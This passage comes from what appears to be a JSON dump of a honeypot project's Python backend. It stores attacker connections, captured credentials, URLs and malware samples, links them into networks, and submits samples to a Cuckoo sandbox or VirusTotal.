host\n\t\telse:\n\t\t\ttry:\n\t\t\t\tip = socket.gethostbyname(host)\n\t\t\texcept:\n\t\t\t\treturn None\n\t\t\t\n\t\trange  = self.get_ip_range(ip)\n\t\treturn ip, range\n\t\n\t@db_wrapper\n\tdef do_housekeeping(self):\n\t\t\n\t\tfor malware in self.session.query(Malware).all():\n\t\t\tmalware.name = random.choice(ANIMAL_NAMES)\n\t\t\n\t\t# rebuild nb_firstconns\n\t\tif False:\n\t\t\t\n\t\t\tnet_cache = {}\n\t\t\t\n\t\t\tfor conn in self.session.query(Connection).all():\n\t\t\t\tif len(conn.conns_before) == 0:\n\t\t\t\t\tif conn.network_id in net_cache:\n\t\t\t\t\t\tnet_cache[conn.network_id] += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tnet_cache[conn.network_id] = 1\n\t\t\t\n\t\t\tfor network in self.session.query(Network).all():\n\t\t\t\tif network.id in net_cache:\n\t\t\t\t\tnetwork.nb_firstconns = net_cache[network.id]\n\t\t\t\telse:\n\t\t\t\t\tnetwork.nb_firstconns = 0\n\t\t\t\t\t\n\t\t\t\tprint \"Net \" + str(network.id) + \": \" + str(network.nb_firstconns)\n\t\n\t@db_wrapper\n\tdef put_session(self, session):\n\t\t\n\t\tconnhash = self.calc_connhash(session[\"stream\"]).encode(\"hex\")\n\t\t\n\t\tbackend_user = self.session.query(User).filter(\n\t\t\tUser.username == session[\"backend_username\"]).first()\n\t\t\n\t\tconn = Connection(ip=session[\"ip\"], user=session[\"user\"],\n\t\t\tdate=session[\"date\"], password=session[\"pass\"],\n\t\t\tstream=json.dumps(session[\"stream\"]),\n\t\t\tconnhash=connhash, backend_user_id=backend_user.id)\n\t\t\n\t\tconn.user     = filter_ascii(conn.user)\n\t\tconn.password = filter_ascii(conn.password)\n\t\t\n\t\tif self.do_ip_to_asn_resolution:\n\t\t\trange = self.get_ip_range(conn.ip)\n\t\t\tif range:\n\t\t\t\tconn.country = range.country\n\t\t\t\tconn.city    = range.city\n\t\t\t\tconn.lat     = range.latitude\n\t\t\t\tconn.lon     = range.longitude\n\t\t\t\tconn.asn     = range.asn\n\t\t\n\t\tself.session.add(conn)\n\t\tself.session.flush() # to get id\n\t\t\n\t\tnetwork_id = None\n\t\t\n\t\tsamples = []\n\t\turls    = 
[]\n\t\tfor sample_json in session[\"samples\"]:\n\t\t\t# Ignore junk - may clean up the db a bit\n\t\t\tif sample_json[\"length\"] < 2000:\n\t\t\t\tcontinue\n\n\t\t\tsample, url = self.create_url_sample(sample_json)\n\t\t\t\n\t\t\tif sample:\n\t\t\t\tif network_id == None and sample.network_id != None:\n\t\t\t\t\tnetwork_id = sample.network_id\n\t\t\t\tsamples.append(sample)\n\t\t\t\t\n\t\t\tif url:\n\t\t\t\tif network_id == None and url.network_id != None:\n\t\t\t\t\tnetwork_id = url.network_id\n\t\t\t\tconn.urls.append(url)\n\t\t\t\turls.append(url)\n\n\t\t# Find previous connections\n\t\t# A connection is associated when:\n\t\t#  - same honeypot/user\n\t\t#  - connection happened as long as 120s before\n\t\t#  - same client ip OR same username/password combo\n\t\tassoc_timediff        = 120\n\t\tassoc_timediff_sameip = 3600\n\t\t\n\t\tprevious_conns = (self.session.query(Connection).\n\t\t\t\tfilter(\n\t\t\t\tor_(\n\t\t\t\t\tand_(\n\t\t\t\t\t\tConnection.date > (conn.date - assoc_timediff),\n\t\t\t\t\t\tConnection.user == conn.user,\n\t\t\t\t\t\tConnection.password == conn.password\n\t\t\t\t\t),\n\t\t\t\t\tand_(\n\t\t\t\t\t\tConnection.date > (conn.date - assoc_timediff_sameip),\n\t\t\t\t\t\tConnection.ip == conn.ip\n\t\t\t\t\t)\n\t\t\t\t),\n\t\t\t\tConnection.backend_user_id == conn.backend_user_id,\n\t\t\t\tConnection.id != conn.id).all())\n\n\t\tfor prev in previous_conns:\n\t\t\tif network_id == None and prev.network_id != None:\n\t\t\t\tnetwork_id = prev.network_id\n\t\t\tconn.conns_before.append(prev)\n\n\t\t# Check connection against all tags\n\t\ttags = self.session.query(Tag).all()\n\t\tfor tag in tags:\n\t\t\tjson_obj = conn.json(depth = 0)\n\t\t\tjson_obj[\"text_combined\"] = filter_ascii(json_obj[\"text_combined\"])\n\t\t\tif simple_eval(tag.code, names=json_obj) == True:\n\t\t\t\tself.db.link_conn_tag(conn.id, tag.id)\n\n\t\t# Only create new networks for connections with urls or associtaed conns,\n\t\t# to prevent the creation of thousands of 
networks\n\t\t# NOTE: only conns with network == NULL will get their network updated\n\t\t#       later so we should only create a network where we cannot easily\n\t\t#       change it later\n\t\thaslogin = conn.user != None and conn.user != \"\"\n\t\tif (len(conn.urls) > 0 or len(previous_conns) > 0) and network_id == None and haslogin:\n\t\t\tprint(\" --- create network --- \")\n\t\t\tnetwork_id = self.create_network().id\n\n\t\t# Update network on self\n\t\tconn.network_id = network_id\n\n\t\t# Update network on all added Urls\n\t\tfor url in urls:\n\t\t\tif url.network_id == None:\n\t\t\t\turl.network_id = network_id\n\n\t\t# Update network on all added Samples\n\t\tfor sample in samples:\n\t\t\tif sample.network_id == None:\n\t\t\t\tsample.network_id = network_id\n\n\t\t# Update network on all previous connections without one\n\t\tif network_id != None:\n\t\t\tfor prev in previous_conns:\n\t\t\t\tif prev.network_id == None:\n\t\t\t\t\tprev.network_id = network_id\n\t\t\t\t\t\n\t\t\t\t\t# Update number of first conns on network\n\t\t\t\t\tif len(prev.conns_before) == 0:\n\t\t\t\t\t\tconn.network.nb_firstconns += 1\n\t\n\t\tself.session.flush()\n\n\t\t# Check for Malware type\n\t\t# \tonly if our network exists AND has no malware associated\n\t\tif conn.network != None and conn.network.malware == None:\n\t\t\t# Find connections with similar connhash\n\t\t\tsimilar_conns = (self.session.query(Connection)\n\t\t\t\t.filter(func.length(Connection.connhash) == len(connhash))\n\t\t\t\t.all())\n\n\t\t\tmin_sim  = 2\n\t\t\tmin_conn = None\n\t\t\tfor similar in similar_conns:\n\t\t\t\tif similar.network_id != None:\n\t\t\t\t\tc1  = connhash.decode(\"hex\")\n\t\t\t\t\tc2  = similar.connhash.decode(\"hex\")\n\t\t\t\t\tsim = self.calc_connhash_similiarity(c1, c2)\n\t\t\t\t\tif sim < min_sim and similar.network.malware != None:\n\t\t\t\t\t\tmin_sim  = sim\n\t\t\t\t\t\tmin_conn = similar\n\n\t\t\t# 0.9: 90% or more words in session are equal\n\t\t\t#\tthink this is probably 
the same kind of malware\n\t\t\t#\tdoesn't need to be the same botnet though!\n\t\t\tif min_sim < 0.9:\n\t\t\t\tconn.network.malware = min_conn.network.malware\n\t\t\telse:\n\t\t\t\tconn.network.malware = Malware()\n\t\t\t\tconn.network.malware.name = random.choice(ANIMAL_NAMES)\n\t\t\t\t\n\t\t\t\tself.session.add(conn.network.malware)\n\t\t\t\tself.session.flush()\n\t\t\n\t\t# Update network number of first connections\n\t\tif len(previous_conns) == 0 and conn.network_id != None:\n\t\t\tconn.network.nb_firstconns += 1\n\n\t\treturn conn.json(depth=1)\n\t\t\n\t@db_wrapper\n\tdef create_network(self):\n\t\tnet = Network()\n\t\tself.session.add(net)\n\t\tself.session.flush()\n\t\treturn net\n\n\tdef create_url_sample(self, f):\n\t\turl = self.session.query(Url).filter(Url.url==f[\"url\"]).first()\n\t\tif url == None:\n\t\t\turl_ip      = None\n\t\t\turl_asn     = None\n\t\t\turl_country = None\n\t\t\t\n\t\t\tif self.do_ip_to_asn_resolution:\n\t\t\t\turl_ip, url_range = self.get_url_info(f[\"url\"])\n\t\t\t\tif url_range:\n\t\t\t\t\turl_asn     = url_range.asn_id\n\t\t\t\t\turl_country = url_range.country\n\t\t\t\n\t\t\turl = Url(url=f[\"url\"], date=f[\"date\"], ip=url_ip, asn_id=url_asn, country=url_country)\n\t\t\tself.session.add(url)\n\t\t\n\t\tif f[\"sha256\"] != None:\n\t\t\tsample = self.session.query(Sample).filter(Sample.sha256 == f[\"sha256\"]).first()\n\t\t\tif sample == None:\n\t\t\t\tresult = None\n\t\t\t\ttry:\n\t\t\t\t\tif self.vt != None:\n\t\t\t\t\t\tvtobj  = self.vt.query_hash_sha256(f[\"sha256\"])\n\t\t\t\t\t\tif vtobj:\n\t\t\t\t\t\t\tresult = str(vtobj[\"positives\"]) + \"/\" + str(vtobj[\"total\"]) + \" \" + self.vt.get_best_result(vtobj)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\n\t\t\t\tsample = Sample(sha256=f[\"sha256\"], name=f[\"name\"], length=f[\"length\"],\n\t\t\t\t\tdate=f[\"date\"], info=f[\"info\"], result=result)\n\t\t\t\tself.session.add(sample)\n\t\t\n\t\t\tif sample.network_id != None and url.network_id == None:\n\t\t\t\turl.network_id = 
sample.network_id\n\t\t\n\t\t\tif sample.network_id == None and url.network_id != None:\n\t\t\t\tsample.network_id = url.network_id\n\t\telse:\n\t\t\tsample = None\n\t\t\n\t\turl.sample = sample\n\t\t\n\t\treturn sample, url\n\n\t@db_wrapper\n\tdef put_sample(self, data):\n\t\tsha256 = hashlib.sha256(data).hexdigest()\n\t\tself.db.put_sample_data(sha256, data)\n\t\tif config.get(\"cuckoo_enabled\"):\n\t\t\tself.cuckoo.upload(os.path.join(config.get(\"sample_dir\"), sha256), sha256)\n\t\telif config.get(\"submit_to_vt\"):\n\t\t\tself.vt.upload_file(os.path.join(config.get(\"sample_dir\"), sha256), sha256)\n\n\t@db_wrapper\n\tdef update_vt_result(self, sample_sha):\n\t\tsample = self.session.query(Sample).filter(Sample.sha256 == sample_sha).first()\n\t\tif sample:\n\t\t\tvtobj = self.vt.query_hash_sha256(sample_sha)\n\t\t\tif vtobj:\n\t\t\t\tsample.result = str(vtobj[\"positives\"]) + \"/\" + str(vtobj[\"total\"]) + \" \" + self.vt.get_best_result(vtobj)\n\t\t\t\treturn sample.json(depth=1)\n\t\treturn None\n\n"
  },
  {
    "path": "backend/cuckoo.py",
    "content": "import json\nimport os\ntry:\n    from urllib.parse import urlparse, urljoin\nexcept ImportError:\n    from urlparse import urlparse, urljoin\n\nimport requests\nfrom requests.auth import HTTPBasicAuth\nfrom util.config import config\n\ntry:\n    import urllib3\n    urllib3.disable_warnings()\nexcept (AttributeError, ImportError):\n    pass\n\nclass Cuckoo():\n\n    def __init__(self, config):\n        self.url_base = config.get(\"cuckoo_url_base\")\n        self.api_user = config.get(\"cuckoo_user\")\n        self.api_passwd = config.get(\"cuckoo_passwd\")\n        self.cuckoo_force = config.get(\"cuckoo_force\")\n\n    def upload(self, path, name):\n\n        if self.cuckoo_force or self.cuckoo_check_if_dup(os.path.basename(path)) is False:\n            print(\"Sending file to Cuckoo\")\n            self.postfile(path, name)\n\n    def cuckoo_check_if_dup(self, sha256):\n        \"\"\"\n        Check if file already was analyzed by cuckoo\n        \"\"\"\n        try:\n            print(\"Looking for tasks for: {}\".format(sha256))\n            res = requests.get(urljoin(self.url_base, \"/files/view/sha256/{}\".format(sha256)),\n                verify=False,\n                auth=HTTPBasicAuth(self.api_user,self.api_passwd),\n                timeout=60)\n            if res and res.ok and res.status_code == 200:\n                print(\"Sample found in Sandbox, with ID: {}\".format(res.json().get(\"sample\", {}).get(\"id\", 0)))\n                return True\n            else:\n                return False\n        except Exception as e:\n            print(e)\n\n        return False\n\n    def postfile(self, artifact, fileName):\n        \"\"\"\n        Send a file to Cuckoo\n        \"\"\"\n        files = {\"file\": (fileName, open(artifact, \"rb\").read())}\n        try:\n            res = requests.post(urljoin(self.url_base, \"tasks/create/file\").encode(\"utf-8\"), files=files, auth=HTTPBasicAuth(\n                            self.api_user,\n   
                         self.api_passwd\n                        ),\n                        verify=False)\n            if res and res.ok:\n                print(\"Cuckoo Request: {}, Task created with ID: {}\".format(res.status_code, res.json()[\"task_id\"]))\n            else:\n                print(\"Cuckoo Request failed: {}\".format(res.status_code))\n        except Exception as e:\n            print(\"Cuckoo Request failed: {}\".format(e))\n        return\n\n\n    def posturl(self, scanUrl):\n        \"\"\"\n        Send a URL to Cuckoo\n        \"\"\"\n        data = {\"url\": scanUrl}\n        try:\n            res = requests.post(urljoin(self.url_base, \"tasks/create/url\").encode(\"utf-8\"), data=data, auth=HTTPBasicAuth(\n                            self.api_user,\n                            self.api_passwd\n                        ),\n                        verify=False)\n            if res and res.ok:\n                print(\"Cuckoo Request: {}, Task created with ID: {}\".format(res.status_code, res.json()[\"task_id\"]))\n            else:\n                print(\"Cuckoo Request failed: {}\".format(res.status_code))\n        except Exception as e:\n            print(\"Cuckoo Request failed: {}\".format(e))\n        return\n"
  },
  {
    "path": "backend/db.py",
    "content": "import time\nimport json\nimport sqlalchemy\nimport random\n\nfrom decorator import decorator\n\nfrom sqlalchemy import Table, Column, BigInteger, Integer, Float, String, MetaData, ForeignKey, Text, Index\n\nfrom sqlalchemy.sql import select, join, insert, text\nfrom sqlalchemy.orm import relationship, sessionmaker, scoped_session\nfrom sqlalchemy.pool import QueuePool\nfrom sqlalchemy.ext.declarative import declarative_base\n\nfrom util.config import config\n\nis_sqlite = \"sqlite://\" in config.get(\"sql\")\n\nprint(\"Creating/Connecting to DB\")\n\n@decorator\ndef db_wrapper(func, *args, **kwargs):\n\tself = args[0]\n\tif self.session:\n\t\treturn func(*args, **kwargs)\n\telse:\n\t\tself.db      = get_db()\n\t\tself.session = self.db.sess\n\n\t\ttry:\n\t\t\t# self.db.end() commits the session in the finally block\n\t\t\treturn func(*args, **kwargs)\n\t\tfinally:\n\t\t\tself.db.end()\n\t\t\tself.db = None\n\t\t\tself.session = None\n\ndef now():\n\treturn int(time.time())\n\ndef filter_ascii(string):\n\tif string == None:\n\t\tstring = \"\"\n\tstring = ''.join(char for char in string if ord(char) < 128 and ord(char) > 32 or char in \"\\r\\n \")\n\treturn string\n\nBase = declarative_base()\n\n# n to m relation connection <-> url\nconns_urls = Table('conns_urls', Base.metadata,\n\tColumn('id_conn', None, ForeignKey('conns.id'), primary_key=True, index=True),\n\tColumn('id_url', None, ForeignKey('urls.id'), primary_key=True, index=True),\n)\n\n# n to m relation connection <-> tag\nconns_tags = Table('conns_tags', Base.metadata,\n\tColumn('id_conn', None, ForeignKey('conns.id'), primary_key=True, index=True),\n\tColumn('id_tag', None, ForeignKey('tags.id'), primary_key=True, index=True),\n)\n\n# n to m relationship connection <-> connection (associates)\nconns_conns = Table('conns_assocs', Base.metadata,\n\tColumn('id_first', None, ForeignKey('conns.id'), primary_key=True, index=True),\n\tColumn('id_last',  None, ForeignKey('conns.id'), primary_key=True, 
index=True),\n)\n\nclass IPRange(Base):\n\t__tablename__ = \"ipranges\"\n\t\n\tip_min    = Column(\"ip_min\",     BigInteger, primary_key=True)\n\tip_max    = Column(\"ip_max\",     BigInteger, primary_key=True)\n\t\n\tcidr      = Column(\"cidr\",       String(20), unique=True)\n\tcountry   = Column(\"country\",    String(3))\n\tregion    = Column(\"region\",     String(128))\n\tcity      = Column(\"city\",       String(128))\n\tzipcode   = Column(\"zipcode\",    String(30))\n\ttimezone  = Column(\"timezone\",   String(8))\n\t\n\tlatitude  = Column(\"latitude\",   Float)\n\tlongitude = Column(\"longitude\",  Float)\n\t\n\tasn_id    = Column('asn', None, ForeignKey('asn.asn'))\n\tasn       = relationship(\"ASN\", back_populates=\"ipranges\")\n\nclass User(Base):\n\t__tablename__ = 'users'\n\n\tid       = Column('id', Integer, primary_key=True)\n\tusername = Column('username', String(32), unique=True, index=True)\n\tpassword = Column('password', String(64))\n\n\tconnections = relationship(\"Connection\", back_populates=\"backend_user\")\n\n\tdef json(self, depth=0):\n\t\treturn {\n\t\t\t\"username\": self.username\n\t\t}\n\t\t\nclass Network(Base):\n\t__tablename__ = 'network'\n\t\n\tid = Column('id', Integer, primary_key=True)\n\n\tsamples     = relationship(\"Sample\",     back_populates=\"network\")\n\turls        = relationship(\"Url\",        back_populates=\"network\")\n\tconnections = relationship(\"Connection\", back_populates=\"network\")\n\t\n\tnb_firstconns = Column('nb_firstconns', Integer, default=0)\n\n\tmalware_id  = Column('malware', None, ForeignKey('malware.id'))\n\tmalware     = relationship(\"Malware\", back_populates=\"networks\")\n\t\n\tdef json(self, depth=0):\n\t\treturn {\n\t\t\t\"id\":          self.id,\n\t\t\t\"samples\":     len(self.samples)     if depth == 0 else map(lambda i: i.sha256, self.samples),\n\t\t\t\"urls\":        len(self.urls)        if depth == 0 else map(lambda i: i.url, self.urls),\n\t\t\t\"connections\": 
len(self.connections) if depth == 0 else map(lambda i: i.id, self.connections),\n\t\t\t\"firstconns\":  self.nb_firstconns,\n\t\t\t\"malware\":     self.malware.json(depth=0)\n\t\t}\n\nclass Malware(Base):\n\t__tablename__ = 'malware'\n\n\tid       = Column('id', Integer, primary_key=True)\n\tname     = Column('name', String(32))\n\tnetworks = relationship(\"Network\", back_populates=\"malware\")\n\n\tdef json(self, depth=0):\n\t\treturn {\n\t\t\t\"id\":          self.id,\n\t\t\t\"name\":        self.name,\n\t\t\t\"networks\":    map(lambda i: i.id if depth == 0 else i.json(), self.networks)\n\t\t}\n\t\n\nclass ASN(Base):\n\t__tablename__ = 'asn'\n\t\n\tasn = Column('asn', BigInteger, primary_key=True)\n\tname = Column('name', String(64))\n\treg = Column('reg', String(32))\n\tcountry = Column('country', String(3))\n\t\n\turls = relationship(\"Url\", back_populates=\"asn\")\n\tconnections = relationship(\"Connection\", back_populates=\"asn\")\n\tipranges = relationship(\"IPRange\", back_populates=\"asn\")\n\t\n\tdef json(self, depth=0):\n\t\treturn {\n\t\t\t\"asn\": self.asn,\n\t\t\t\"name\": self.name,\n\t\t\t\"reg\": self.reg,\n\t\t\t\"country\": self.country,\n\t\t\t\n\t\t\t\"urls\": map(lambda url : url.url if depth == 0\n\t\t\t   else url.json(depth - 1), self.urls[:10]),\n\t\t\t\n\t\t\t\"connections\": None if depth == 0 else map(lambda connection :\n                connection.json(depth - 1), self.connections[:10])\n\t\t}\n\nclass Sample(Base):\n\t__tablename__ = 'samples'\n\t\n\tid = Column('id', Integer, primary_key=True)\n\tsha256 = Column('sha256', String(64), unique=True, index=True)\n\tdate = Column('date', Integer)\n\tname = Column('name', String(32))\n\tfile = Column('file', String(512))\n\tlength = Column('length', Integer)\n\tresult = Column('result', String(32))\n\tinfo = Column('info', Text())\n\t\n\turls = relationship(\"Url\", back_populates=\"sample\")\n\t\n\tnetwork_id  = Column('network', None, ForeignKey('network.id'), index=True)\n\tnetwork 
    = relationship(\"Network\", back_populates=\"samples\")\n\t\n\tdef json(self, depth=0):\n\t\treturn {\n\t\t\t\"sha256\": self.sha256,\n\t\t\t\"date\": self.date,\n\t\t\t\"name\": self.name,\n\t\t\t\"length\": self.length,\n\t\t\t\"result\": self.result,\n\t\t\t\"info\": self.info,\n\t\t\t\"urls\": len(self.urls) if depth == 0 else map(lambda url :\n                url.json(depth - 1), self.urls),\n\t\t\t\"network\": self.network_id if depth == 0 else self.network.json()\n\t\t}\n\t\nclass Connection(Base):\n\t__tablename__ = 'conns'\n\t\n\tid = Column('id', Integer, primary_key=True)\n\tip = Column('ip', String(16))\n\tdate = Column('date', Integer, index=True)\n\tuser = Column('user', String(16))\n\tpassword = Column('pass', String(16))\n\tconnhash = Column('connhash', String(256), index=True)\n\n\tstream = Column('text_combined', Text())\n\n\tasn_id = Column('asn', None, ForeignKey('asn.asn'), index=True)\n\tasn = relationship(\"ASN\", back_populates=\"connections\")\n\n\tbackend_user_id = Column('backend_user_id', None, ForeignKey('users.id'), index=True)\n\tbackend_user = relationship(\"User\", back_populates=\"connections\")\n\n\tipblock   = Column('ipblock', String(32))\n\tcountry   = Column('country', String(3))\n\tcity      = Column('city',    String(32))\n\tlon       = Column('lon',     Float)\n\tlat       = Column('lat',     Float)\n\t\n\turls    = relationship(\"Url\", secondary=conns_urls, back_populates=\"connections\")\n\ttags    = relationship(\"Tag\", secondary=conns_tags, back_populates=\"connections\")\n\t\n\tnetwork_id  = Column('network', None, ForeignKey('network.id'), index=True)\n\tnetwork     = relationship(\"Network\", back_populates=\"connections\")\n\t\n\tconns_before = relationship(\"Connection\", secondary=conns_conns,\n\t\t\tback_populates=\"conns_after\", \n            primaryjoin=(conns_conns.c.id_last==id),\n            secondaryjoin=(conns_conns.c.id_first==id))\n\tconns_after  = relationship(\"Connection\", 
secondary=conns_conns,\n\t\t\tback_populates=\"conns_before\", \n            primaryjoin=(conns_conns.c.id_first==id),\n            secondaryjoin=(conns_conns.c.id_last==id))\n\t\n\tdef json(self, depth=0):\n\t\t\n\t\tstream = None\n\t\t\n\t\tif depth > 0:\n\t\t\ttry:\n\t\t\t\tstream = json.loads(self.stream)\n\t\t\texcept:\n\t\t\t\ttry:\n\t\t\t\t\t# Fix Truncated JSON ...\n\t\t\t\t\ts = self.stream[:self.stream.rfind(\"}\")] + \"}]\"\n\t\t\t\t\tstream = json.loads(s)\n\t\t\t\texcept:\n\t\t\t\t\tstream = []\n\t\t\n\t\treturn {\n\t\t\t\"id\":   self.id,\n\t\t\t\"ip\":   self.ip,\n\t\t\t\"date\": self.date,\n\t\t\t\"user\": self.user,\n\t\t\t\"password\": self.password,\n\t\t\t\"connhash\": self.connhash,\n\t\t\t\"stream\": stream,\n\t\t\t\n\t\t\t\"network\": self.network_id if depth == 0 else (self.network.json() if self.network != None else None),\n\t\t\t\n\t\t\t\"asn\": None if self.asn == None else self.asn.json(0),\n\t\t\t\n\t\t\t\"ipblock\":   self.ipblock,\n\t\t\t\"country\":   self.country,\n\t\t\t\"city\":      self.city,\n\t\t\t\"longitude\": self.lon,\n\t\t\t\"latitude\":  self.lat,\n\n\t\t\t\"conns_before\": map(lambda conn : conn.id if depth == 0\n\t\t\t\telse conn.json(depth - 1), self.conns_before),\n\t\t\t\"conns_after\": map(lambda conn : conn.id if depth == 0\n\t\t\t\telse conn.json(depth - 1), self.conns_after),\n\n\t\t\t\"backend_user\": self.backend_user.username,\n\t\t\t\n\t\t\t\"urls\": len(self.urls) if depth == 0 else map(lambda url :\n\t\t\t   url.json(depth - 1), self.urls),\n\n\t\t\t\"tags\": len(self.tags) if depth == 0 else map(lambda tag :\n\t\t\t   tag.json(depth - 1), self.tags),\n\t\t}\n\nIndex('idx_conn_user_pwd', Connection.user, Connection.password)\n\t\nclass Url(Base):\n\t__tablename__ = 'urls'\n\t\n\tid   = Column('id', Integer, primary_key=True)\n\turl  = Column('url', String(256), unique=True, index=True)\n\tdate = Column('date', Integer)\n\t\n\tsample_id = Column('sample', None, ForeignKey('samples.id'), 
index=True)\n\tsample    = relationship(\"Sample\", back_populates=\"urls\")\n\t\n\tnetwork_id  = Column('network', None, ForeignKey('network.id'), index=True)\n\tnetwork     = relationship(\"Network\", back_populates=\"urls\")\n\t\n\tconnections = relationship(\"Connection\", secondary=conns_urls, back_populates=\"urls\")\n\t\n\tasn_id = Column('asn', None, ForeignKey('asn.asn'))\n\tasn = relationship(\"ASN\", back_populates=\"urls\")\n\t\n\tip  = Column('ip', String(32))\n\tcountry = Column('country', String(3))\n\t\n\tdef json(self, depth=0):\n\t\treturn {\n\t\t\t\"url\": self.url,\n\t\t\t\"date\": self.date,\n\t\t\t\"sample\": None if self.sample == None else \n\t\t\t\t(self.sample.sha256 if depth == 0\n\t\t\t\t\telse self.sample.json(depth - 1)),\n\t\t\t\t\n\t\t\t\"connections\": len(self.connections) if depth == 0 else map(lambda connection :\n\t\t\t\t\t  connection.json(depth - 1), self.connections),\n\t\t\t\n\t\t\t\"asn\": None if self.asn == None else \n\t\t\t\t(self.asn.asn if depth == 0\n\t\t\t\t\telse self.asn.json(depth - 1)),\n\t\t\t\t\n\t\t\t\"ip\": self.ip,\n\t\t\t\"country\": self.country,\n\t\t\t\"network\": self.network_id if depth == 0 else self.network.json()\n\t\t}\n\nclass Tag(Base):\n\t__tablename__ = 'tags'\n\t\n\tid   = Column('id', Integer, primary_key=True)\n\tname = Column('name', String(32), unique=True)\n\tcode = Column('code', String(256))\n\n\tconnections = relationship(\"Connection\", secondary=conns_tags, back_populates=\"tags\")\n\t\n\tdef json(self, depth=0):\n\t\treturn {\n\t\t\t\"name\": self.name,\n\t\t\t\"code\": self.code,\n\t\t\t\t\n\t\t\t\"connections\": None if depth == 0 else map(lambda connection :\n                connection.json(depth - 1), self.connections)\n\t\t}\n\t\n\t\nsamples = Sample.__table__ \nconns   = Connection.__table__\nurls    = Url.__table__\ntags    = Tag.__table__\n\neng = None\n\nif is_sqlite:\n\teng = 
sqlalchemy.create_engine(config.get(\"sql\"),\n\t\t\t\t\t\t\t\tpoolclass=QueuePool,\n\t\t\t\t\t\t\t\tpool_size=1,\n\t\t\t\t\t\t\t\tmax_overflow=20,\n\t\t\t\t\t\t\t\tconnect_args={'check_same_thread': False})\nelse:\n\teng = sqlalchemy.create_engine(config.get(\"sql\"),\n\t\t\t\t\t\t\t\tpoolclass=QueuePool,\n\t\t\t\t\t\t\t\tpool_size=config.get(\"max_db_conn\"),\n\t\t\t\t\t\t\t\tmax_overflow=config.get(\"max_db_conn\"))\n\nBase.metadata.create_all(eng)\n\ndef get_db():\n\treturn DB(scoped_session(sessionmaker(bind=eng)))\n\ndef delete_everything():\n\tspare_tables = [\"users\", \"asn\", \"ipranges\"]\n\n\t# SET FOREIGN_KEY_CHECKS is MySQL-only and would fail on sqlite\n\tif not is_sqlite:\n\t\teng.execute(\"SET FOREIGN_KEY_CHECKS=0;\")\n\tfor table in Base.metadata.tables.keys():\n\t\tif table in spare_tables:\n\t\t\tcontinue\n\t\tsql_text = \"DELETE FROM \" + table + \";\"\n\t\tprint sql_text\n\t\teng.execute(sql_text)\n\tif not is_sqlite:\n\t\teng.execute(\"SET FOREIGN_KEY_CHECKS=1;\")\n\nclass DB:\n\t\n\tdef __init__(self, sess):\n\t\tself.sample_dir    = config.get(\"sample_dir\")\n\t\tself.limit_samples = 32\n\t\tself.limit_urls    = 32\n\t\tself.limit_conns   = 32\n\t\tself.sess          = sess\n\n\tdef end(self):\n\t\ttry:\n\t\t\tself.sess.commit()\n\t\tfinally:\n\t\t\tself.sess.remove()\n\n\t# INPUT\n\t\n\tdef put_sample_data(self, sha256, data):\n\t\tfile = self.sample_dir + \"/\" + sha256\n\t\tfp = open(file, \"wb\")\n\t\tfp.write(data)\n\t\tfp.close()\n\t\t\n\t\tself.sess.execute(samples.update().where(samples.c.sha256 == sha256).values(file=file))\n\t\t\t\n\tdef put_sample_result(self, sha256, result):\n\t\tself.sess.execute(samples.update().where(samples.c.sha256 == sha256).values(result=result))\n\n\tdef put_url(self, url, date, url_ip, url_asn, url_country):\n\t\tex_url = self.sess.execute(urls.select().where(urls.c.url == url)).fetchone()\n\t\tif ex_url:\n\t\t\treturn ex_url[\"id\"]\n\t\telse:\n\t\t\treturn self.sess.execute(urls.insert().values(url=url, date=date, sample=None, ip=url_ip, asn=url_asn, country=url_country)).inserted_primary_key[0]\n\n\tdef 
put_conn(self, ip, user, password, date, text_combined, asn, block, country, connhash):\n\t\t# use explicit column names so values cannot shift onto the wrong\n\t\t# columns when the table definition changes\n\t\treturn self.sess.execute(conns.insert().values({\"ip\": ip, \"date\": date, \"user\": user, \"pass\": password, \"text_combined\": text_combined, \"asn\": asn, \"ipblock\": block, \"country\": country, \"connhash\": connhash})).inserted_primary_key[0]\n\n\tdef put_sample(self, sha256, name, length, date, info, result):\n\t\tex_sample = self.get_sample(sha256).fetchone()\n\t\tif ex_sample:\n\t\t\treturn ex_sample[\"id\"]\n\t\telse:\n\t\t\treturn self.sess.execute(samples.insert().values(sha256=sha256, date=date, name=name, length=length, result=result, info=info)).inserted_primary_key[0]\n\n\tdef link_conn_url(self, id_conn, id_url):\n\t\tself.sess.execute(conns_urls.insert().values(id_conn=id_conn, id_url=id_url))\n\n\tdef link_url_sample(self, id_url, id_sample):\n\t\tself.sess.execute(urls.update().where(urls.c.id == id_url).values(sample=id_sample))\n\n\tdef link_conn_tag(self, id_conn, id_tag):\n\t\tself.sess.execute(conns_tags.insert().values(id_conn=id_conn, id_tag=id_tag))\n\n\t# OUTPUT\n\t\n\tdef get_conn_count(self):\n\t\tq = \"\"\"\n\t\tSELECT COUNT(id) as count FROM conns\n\t\t\"\"\"\n\t\treturn self.sess.execute(text(q)).fetchone()[\"count\"]\n\t\n\tdef get_sample_count(self):\n\t\tq = \"\"\"\n\t\tSELECT COUNT(id) as count FROM samples\n\t\t\"\"\"\n\t\treturn self.sess.execute(text(q)).fetchone()[\"count\"]\n\t\n\tdef get_url_count(self):\n\t\tq = \"\"\"\n\t\tSELECT COUNT(id) as count FROM urls\n\t\t\"\"\"\n\t\treturn self.sess.execute(text(q)).fetchone()[\"count\"]\n\n\tdef search_sample(self, q):\n\t\tq = \"%\" + q + \"%\"\n\t\treturn self.sess.execute(samples.select().where(samples.c.name.like(q) | samples.c.result.like(q)).limit(self.limit_samples))\n\n\tdef search_url(self, q):\n\t\tsearch = \"%\" + q + \"%\"\n\t\tq = \"\"\"\n\t\tSELECT urls.url as url, urls.date as date, samples.sha256 as sample\n\t\tFROM urls\n\t\tLEFT JOIN samples on samples.id = urls.sample\n\t\tWHERE urls.url LIKE :search\n\t\tLIMIT :limit\n\t\t\"\"\"\t\t\n\t\treturn self.sess.execute(text(q), 
